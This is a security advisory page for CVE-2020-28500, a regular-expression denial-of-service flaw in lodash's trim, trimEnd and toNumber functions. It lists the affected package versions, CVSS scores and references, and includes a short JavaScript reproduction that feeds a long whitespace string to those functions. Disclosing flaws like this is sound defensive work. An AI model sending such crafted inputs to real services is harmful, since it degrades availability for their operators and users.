CVE-2020-28500
MEDIUM5.3EPSS 0.24%Regular Expression Denial of Service (ReDoS) in lodash
Description
All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the `toNumber`, `trim` and `trimEnd` functions. Steps to reproduce (provided by reporter Liyuan Chen): ```js var lo = require('lodash'); function build_blank(n) { var ret = "1" for (var i = 0; i < n; i++) { ret += " " } return ret + "1"; } var s = build_blank(50000) var time0 = Date.now(); lo.trim(s) var time_cost0 = Date.now() - time0; console.log("time_cost0: " + time_cost0); var time1 = Date.now(); lo.toNumber(s) var time_cost1 = Date.now() - time1; console.log("time_cost1: " + time_cost1); var time2 = Date.now(); lo.trimEnd(s); var time_cost2 = Date.now() - time2; console.log("time_cost2: " + time_cost2); ```
Affected packages (6)
- Debian/node-lodashfrom 0, < 4.17.21+dfsg+~cs8.31.173-1
- npm/lodash>= 4.0.0, < 4.17.21
- npm/lodash-es>= 4.0.0, < 4.17.21
- npm/lodash.trim>= 4.0.0, <= 4.5.1
- npm/lodash.trimend>= 4.0.0, <= 4.5.1
- RubyGems/lodash-rails>= 4.0.0, < 4.17.21
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | MEDIUM5.3 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L |
References (21)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2020-28500
- ADVISORYhttps://security-tracker.debian.org/tracker/CVE-2020-28500
- PATCHhttps://github.com/lodash/lodash
- WEBhttps://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf
- WEBhttps://github.com/github/advisory-database/pull/6139
- WEBhttps://github.com/lodash/lodash/blob/npm/trimEnd.js%23L8
- WEBhttps://github.com/lodash/lodash/commit/c4847ebe7d14540bb28a8b932a9ce1b9ecbfee1a
- WEBhttps://github.com/lodash/lodash/pull/5065
- WEBhttps://github.com/lodash/lodash/pull/5065/commits/02906b8191d3c100c193fe6f7b27d1c40f200bb7
- WEBhttps://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2020-28500.yml
- WEBhttps://security.netapp.com/advisory/ntap-20210312-0006
- WEBhttps://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074896
- WEBhttps://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074894
- WEBhttps://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074892
- WEBhttps://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074895
- WEBhttps://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074893
- WEBhttps://snyk.io/vuln/SNYK-JS-LODASH-1018905
- WEBhttps://www.oracle.com/security-alerts/cpujan2022.html
- WEBhttps://www.oracle.com//security-alerts/cpujul2021.html
- WEBhttps://www.oracle.com/security-alerts/cpujul2022.html
- WEBhttps://www.oracle.com/security-alerts/cpuoct2021.html